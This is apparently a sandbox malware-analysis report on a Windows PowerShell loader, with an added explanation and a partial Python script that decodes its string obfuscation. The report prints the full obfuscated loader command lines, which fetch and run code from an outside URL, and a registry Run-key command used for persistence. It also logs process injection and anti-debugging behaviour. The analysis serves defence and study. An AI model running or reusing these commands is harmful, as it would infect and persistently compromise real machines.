Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Efterbrndingen)$GlObAl:reKuRSERNes = [sYSTem.TExT.eNcOdiNG]::asCii.GetSTrinG($FinheDERNE)$glObAL:TOTeMisTs=$ReKURsErneS.SUbstRiNg($hEdVinenE143,$MouLdINGS)<#Udskammende Udstdelsers P
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Upstares33 $Systemudviklingsarbejde $Varsomt), (Keratoscopy @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Anretterborde = [AppDomain]::CurrentDomain.GetA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Konflikttilstanden59)), $Rockerproblemet).DefineDynamicModule($Bilirubinuria, $false).DefineType($Foujdary, $Skruninger, [System.Multi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Efterbrndingen)$GlObAl:reKuRSERNes = [sYSTem.TExT.eNcOdiNG]::asCii.GetSTrinG($FinheDERNE)$glObAL:TOTeMisTs=$ReKURsErneS.SUbstRiNg($hEdVinenE143,$MouLdINGS)<#Udskammende Udstdelsers P
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. 
Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePa
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. 
Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAD362C push esp; retf 2_2_00007FFC3DAD363A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DAD52B3 push eax; ret 2_2_00007FFC3DAD52C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC3DBA44D6 push esi; retf 2_2_00007FFC3DBA44D7
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Afbenyt
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5923
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7443
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2295
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7312 Thread sleep count: 1536 > 30
Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe Thread sleep count: Count: 1536 delay: -5
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2502020632.0000000006BC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.1463396941.0000021368D3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\msiexec.exe Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0468D434 LdrInitializeThunk, 10_2_0468D434
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: Yara match File source: amsi64_7304.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 8052, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4060000
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. 
Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $enchodus;function haggardly($afhjlpningens){ .($remittable) ($afhjlpningens)} function slappelse199($refallen){$tidsskriftssamlingens170=5;do{$eight+=$refallen[$tidsskriftssamlingens170];$tidsskriftssamlingens170+=6;$nysgerrighederne=format-list} until(!$refallen[$tidsskriftssamlingens170])$eight}$gildhall=slappelse199 'theren coate overtpudsi.flerdw';$gildhall+=slappelse199 'sygemekarbob kontc for lcopori efteearbejnfarest';$horede=slappelse199 'informdinaronavnezgymnoichinolae osl foraa .kin/';$gl=slappelse199 'me intbjerglde.ousi per1inani2';$belastedes=' veks[mon.sndiskoespit,tpol,g.stenusurinrenoncorord ivgrossiutn ec andee mstp nedgofunkti nekdnout itwitchmrigsga remin sacralamb g rensebillirstivn] s,he:dermo:.orbrsdeccee uksec afveuv nusrgeitjiseglet amorydialypsammerdokumorudystunderolysthcgui aoto.dklanmrk=omsme$uforsgcottal';$horede+=slappelse199 ' c.pr5calas.tidta0repas .nder(termiwhaemoi udkang shidradero tranwdviguschart enternmath,tf rdo kul.1outpi0feeds.salte0i dpr;s.ork asylwoversiproduns,yat6 aadr4under;k nst guildx egrl6chivy4rea e;gidse undorsekvevhurtl:datam1nedgj3pla o4hexap.pr du0punkt)sabel snuppg,ttace slutctnderkompr.odambr/dalze2reneg0 resk1 erio0oldti0 hiro1tasim0domen1.epar scrapfdebowi squar zimmeskubbfpreopoalexaxgalla/ apir1autu 3rumle4safts.un la0';$taw=slappelse199 'untirusemifsbe,dee dekar rntg-gul.iatakeog ncabe n.kvn uddat';$aktricens=slappelse199 'valerhgr ektoverftmbelpprigolsdyret:quake/ told/s.ingpautoglkonj,aeventnskvulatruffcfiskehterebi hydre st kvcowpae ro.krposta.do imapooliu oc t/g bioa ostedhemskmkamiki varinj.rds- unshu,algss overe.sperram,ia/periotf.gomekrat lden aebajerfgaaseobrugsn sys.kmervrdabrete stearje,as. 
snk f dis.l no.aa';$dipolen=slappelse199 'aliqu>';$remittable=slappelse199 'enjoii uncoepomolx';$sabirs='ratsbanes';$moos='\preconversion.pri';haggardly (slappelse199 'kasse$warslglsninlsa ssosovepb l ndaimparlhuppe:udfolpove,ilbeskru battmpolonbr.gefu,ostsm n,uts just=therm$bat le.nterndefunvafske: i noasamk psynkrptre adauktiaoverithumouaundse+exaes$ fdmpmp.mpeo winko reins');haggardly (slappelse199 'sk fe$ ava gnonrelchab,oindopbb.asfaformilsvagh:mutags ,owle forsroligov g.ffi mis.c de rere onpshuntrspindine rasgenhrep litr tegnndovneed zinsuford=dioxi$plaina,ormuk novatskruermazi isubstcbandoebreddnnymphs tegn.beboeshogfipnovusludaanihonortpa ul(unpro$ ,inuddartbicha,gp wingoyadeflbundle wo.lndacry)');haggardly (slappelse199 $belastedes);$aktricens=$serviceprisernes[0];$nonmaritally=(slappelse199 ' besk$boliggtoi.elarmbaoskralbb gloahallolunarb:s oftrsmagse edstv ru,eiquartseksisotoraer ruteysam.e= tra,namir eunderwpille-hy,eroropanb rmebj turievacuucepit.tpassa usurstundeyunderscerebtgenere,oncomjocos.resbo$tubicgkatacibrevvlmaraudmotelhpuffeacentelseriol');haggardly ($nonmaritally);haggardly (slappelse199 'pir q$malloranomae priv ylenialgr s frucosevilror
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "afbenyt" /t reg_expand_sz /d "%pigling% -windowstyle 1 $kolumners112=(gi 'hkcu:\software\abanga62\').getvalue('metanetwork');%pigling% ($kolumners112)"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $enchodus;function haggardly($afhjlpningens){ .($remittable) ($afhjlpningens)} function slappelse199($refallen){$tidsskriftssamlingens170=5;do{$eight+=$refallen[$tidsskriftssamlingens170];$tidsskriftssamlingens170+=6;$nysgerrighederne=format-list} until(!$refallen[$tidsskriftssamlingens170])$eight}$gildhall=slappelse199 'theren coate overtpudsi.flerdw';$gildhall+=slappelse199 'sygemekarbob kontc for lcopori efteearbejnfarest';$horede=slappelse199 'informdinaronavnezgymnoichinolae osl foraa .kin/';$gl=slappelse199 'me intbjerglde.ousi per1inani2';$belastedes=' veks[mon.sndiskoespit,tpol,g.stenusurinrenoncorord ivgrossiutn ec andee mstp nedgofunkti nekdnout itwitchmrigsga remin sacralamb g rensebillirstivn] s,he:dermo:.orbrsdeccee uksec afveuv nusrgeitjiseglet amorydialypsammerdokumorudystunderolysthcgui aoto.dklanmrk=omsme$uforsgcottal';$horede+=slappelse199 ' c.pr5calas.tidta0repas .nder(termiwhaemoi udkang shidradero tranwdviguschart enternmath,tf rdo kul.1outpi0feeds.salte0i dpr;s.ork asylwoversiproduns,yat6 aadr4under;k nst guildx egrl6chivy4rea e;gidse undorsekvevhurtl:datam1nedgj3pla o4hexap.pr du0punkt)sabel snuppg,ttace slutctnderkompr.odambr/dalze2reneg0 resk1 erio0oldti0 hiro1tasim0domen1.epar scrapfdebowi squar zimmeskubbfpreopoalexaxgalla/ apir1autu 3rumle4safts.un la0';$taw=slappelse199 'untirusemifsbe,dee dekar rntg-gul.iatakeog ncabe n.kvn uddat';$aktricens=slappelse199 'valerhgr ektoverftmbelpprigolsdyret:quake/ told/s.ingpautoglkonj,aeventnskvulatruffcfiskehterebi hydre st kvcowpae ro.krposta.do imapooliu oc t/g bioa ostedhemskmkamiki varinj.rds- unshu,algss overe.sperram,ia/periotf.gomekrat lden aebajerfgaaseobrugsn sys.kmervrdabrete stearje,as. 
snk f dis.l no.aa';$dipolen=slappelse199 'aliqu>';$remittable=slappelse199 'enjoii uncoepomolx';$sabirs='ratsbanes';$moos='\preconversion.pri';haggardly (slappelse199 'kasse$warslglsninlsa ssosovepb l ndaimparlhuppe:udfolpove,ilbeskru battmpolonbr.gefu,ostsm n,uts just=therm$bat le.nterndefunvafske: i noasamk psynkrptre adauktiaoverithumouaundse+exaes$ fdmpmp.mpeo winko reins');haggardly (slappelse199 'sk fe$ ava gnonrelchab,oindopbb.asfaformilsvagh:mutags ,owle forsroligov g.ffi mis.c de rere onpshuntrspindine rasgenhrep litr tegnndovneed zinsuford=dioxi$plaina,ormuk novatskruermazi isubstcbandoebreddnnymphs tegn.beboeshogfipnovusludaanihonortpa ul(unpro$ ,inuddartbicha,gp wingoyadeflbundle wo.lndacry)');haggardly (slappelse199 $belastedes);$aktricens=$serviceprisernes[0];$nonmaritally=(slappelse199 ' besk$boliggtoi.elarmbaoskralbb gloahallolunarb:s oftrsmagse edstv ru,eiquartseksisotoraer ruteysam.e= tra,namir eunderwpille-hy,eroropanb rmebj turievacuucepit.tpassa usurstundeyunderscerebtgenere,oncomjocos.resbo$tubicgkatacibrevvlmaraudmotelhpuffeacentelseriol');haggardly ($nonmaritally);haggardly (slappelse199 'pir q$malloranomae priv ylenialgr s frucosevilrorganyk,nge.unprohfreelepaJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "afbenyt" /t reg_expand_sz /d "%pigling% -windowstyle 1 $kolumners112=(gi 'hkcu:\software\abanga62\').getvalue('metanetwork');%pigling% ($kolumners112)"
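The `slappelse199` function in the two powershell.exe command lines above is the entire string-obfuscation scheme of this loader stage: it starts at index 5 of its argument and keeps every sixth character, so each long word-salad literal is filler wrapped around a short plaintext. `haggardly` then runs every decoded string through `.($remittable)`, and `$remittable` itself decodes to `iex`. The Python below is an added worked example, not code from the Joe Sandbox report or from the sample. It recovers the offset and stride from the function body with a regular expression and decodes the call sites, assuming only what is printed in the command line above. One caveat for anyone copying from this page: the HTML view collapses runs of spaces, so literals that contain two or more adjacent spaces (the remainder of `$horede`, the `$belastedes` string) desynchronise and have to be decoded from the raw .bat; the excerpt below therefore carries only the literals that decode cleanly from the rendered text.

```python
import re
from collections import OrderedDict

# Constructed excerpt of the powershell.exe command line shown in the report:
# the decoder function plus the call sites whose literals contain no runs of
# spaces (the rendered page collapses those, which desynchronises the stride).
CMDLINE = (
    "function slappelse199($refallen){$tidsskriftssamlingens170=5;"
    "do{$eight+=$refallen[$tidsskriftssamlingens170];"
    "$tidsskriftssamlingens170+=6;$nysgerrighederne=format-list}"
    " until(!$refallen[$tidsskriftssamlingens170])$eight}"
    "$gildhall=slappelse199 'theren coate overtpudsi.flerdw';"
    "$gildhall+=slappelse199 'sygemekarbob kontc for lcopori efteearbejnfarest';"
    "$horede=slappelse199 'informdinaronavnezgymnoichinolae osl foraa .kin/';"
    "$gl=slappelse199 'me intbjerglde.ousi per1inani2';"
    "$taw=slappelse199 'untirusemifsbe,dee dekar rntg-gul.iatakeog ncabe n.kvn uddat';"
    "$dipolen=slappelse199 'aliqu>';"
    "$remittable=slappelse199 'enjoii uncoepomolx';"
)

# Shape of the decoder: function NAME($arg){$i=OFFSET;do{$acc+=$arg[$i];$i+=STRIDE; ...
DECODER_RE = re.compile(
    r"function\s+(\w+)\s*\(\$(\w+)\)\s*\{\s*\$(\w+)\s*=\s*(\d+)\s*;"
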